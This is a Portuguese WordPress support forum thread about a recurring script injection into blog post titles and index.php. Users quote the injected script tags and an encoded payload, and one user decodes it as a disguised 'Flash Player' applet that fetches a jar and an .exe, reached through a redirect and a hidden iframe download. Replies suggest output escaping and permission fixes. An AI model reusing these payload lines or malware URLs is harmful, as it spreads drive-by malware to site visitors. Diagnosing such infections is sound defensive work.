Não existe qualquer tipo de erro, simplesmente não estás a filtrar o conteúdo que colocas “cá para fora”, usa por exemplo a função esc_attr ou wp_strip_all_tags e tens o problema resolvido
Thread Starter
João
(@fernando-kerkhoff)
aconteceu novamente, a pessoa colocou esse script em um titulo de um post do meu blog:
<script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script>
ficou assim:
Título <script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script>
daí quando abre o blog, pede para instalar algo estilo o java
já te disse, NÃO ESTÁS A FILTRAR O TEU OUTPUT.
usa por exemplo a função esc_attr ou wp_strip_all_tags e tens o problema resolvido
Thread Starter
João
(@fernando-kerkhoff)
esse arquivo .js dele tem isso dentro:
document.write(unescape(‘%3C%61%70%70%6C%65%74%20%6E%61%6D%65%3D%22%41%64%6F%62%65%20%46%6C%61%73%68%20%50%6C%61%79%65%72%20%31%31%22%20%63%6F%64%65%3D%22%61%66%70%2E%63%6C%61%73%73%22%20%61%72%63%68%69%76%65%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%62%73%36%64%65%61%67%6F%73%74%6F%2E%63%6F%6D%2F%70%6F%72%74%61%6C%2F%6C%61%6E%67%75%61%67%65%2F%61%66%70%2E%6A%61%72%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%70%61%72%61%6D%20%6E%61%6D%65%3D%22%6C%69%6E%6B%22%20%76%61%6C%75%65%3D%22%68%74%74%70%3A%2F%2F%64%76%67%6D%65%74%74%69%6E%67%65%6E%2E%68%75%6E%64%65%2D%74%72%61%69%6E%69%6E%67%2E%69%6E%66%6F%2F%6C%61%6E%67%75%61%67%65%2F%6A%78%76%69%6E%73%74%61%6C%6C%2E%65%78%65%22%3E%3C%2F%61%70%70%6C%65%74%3E’));
que descriptografado dá isso:
<applet name=”Adobe Flash Player 11″ code=”afp.class” archive=”http://www.abs6deagosto.com/portal/language/afp.jar” width=”1″ height=”1″><param name=”link” value=”http://dvgmettingen.hunde-training.info/language/jxvinstall.exe”></applet>
Thread Starter
João
(@fernando-kerkhoff)
pode me explicar como usar essas funções? onde eu coloco elas?
Qual o tema que está a usar, e quais os plugins que tem instalado?
Estou com o mesmo problema, retiro esse script do meu site <script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script> , porém depois de algumas horas ele volta novamente pra index.php e para o titulo do primeiro post , não sei aonde está localizado o script que posta isso automáticamente 🙁
Se alguém puder ajudar a retirar de vez essa praga agradeço 🙁
Eu também estou com este problema e não acho solução na internet.
será que estou a falar chinês?
A ver se é desta… Como refere @cyclop, esse código (Javascript) só é possível ser colocado no título de um artigo por um utilizador com permissões de unfiltered_html, ou seja, Editores e Administradores.
Note que Isto não é em nada diferente do que eles podem colocar no conteúdo do post.
Isto não é nem uma vulnerabilidade nem um hack. Por favor consulte a documentação sobre unfiltered_html e pense bem se os seus autores têm mesmo que ter permissões de Editor ou Administrador.
Com relação a publicação do script no titulo do post já foi resolvido com a o unfiltered_html , porém ele sempre está aparecendo na index.php com esse mesmo script , não sei como ele injeta esse código , já mudei todas as senhas e nada 🙁
Abraços e Obrigado pela atenção de vocês 🙂
cyclop onde se coloca a função?
Pessoal,
estou tendo o mesmo problema, porém não uso wordpress! Não achei nenhum outro lugar na internet onde pessoas estejam tendo o mesmo problema, então decidi postar aqui.
Depois de muita pesquisa fiquei ainda mais confuso, sou programador e a princípio pensei se tratar de uma injeção XSS/HTML (quando alguem adiciona um script através de campos de formulário ou via barra de endereços), mas parece não ser pois o arquivo tem sido editado na sua forma estática, quero dizer que o código fonte do HTML é alterado fisicamente no servidor, não apenas no cliente.
Baixei o arquivo por FTP e lá estava ela, essa linha foi adicionada no meu index.php também, pude apagá-la e agora aguardo que modifiquem novamente para eu tentar rastrear, mas até então nada.
Fizeram o mesmo em outro site do meu servidor, que possui senha diferente, então me preocupa que a pessoa tenha privilégios de super usuário (root).
Em sequência acontece o seguinte (não executem o .exe no final, provavél virús/trojan)
<script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script>
Que possui a seguinte instrução codificada, apenas redireciona para uma outra página, domínio de um restaurante japones na françca (provável que invadido também):
<script>document.location.href=”http://www.sushido.fr/ads.js/?A”</script>
Que direciona através de uma página falsa da adobe (phishing) e executa o download automático através do iframe:
<iframe src=”?D” width=”0″ height=”0″ frameborder=”0″ ></iframe>
O que o executável faz só deus sabe!
Se alguém tiver uma idéia de como essa pessoa entra no servidor, postem aqui.
Abraço,
Tiago
a tag <script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script> vem antes do DOCTYPE, por incrivel que pareça, nunca ouvir falar de uma injeção antes do <html>, muito menos permanente.
Bom, vamos lá:
<script src=http://www.buhosfcxalapa.com/xmlrpc/ads.js/></script>
<script src=http://www.buhosfcxalapa.com/xmlrpc/ads.js/></script> vem aparecendo quase todo dia isso para mim no título.
Sempre nos novos artigos: blogpop.com.br
Experimentei hoje colocar no arquivo single.php do tema a permissão 644 e estou esperando, já já digo para vocês se deu certo.
abs
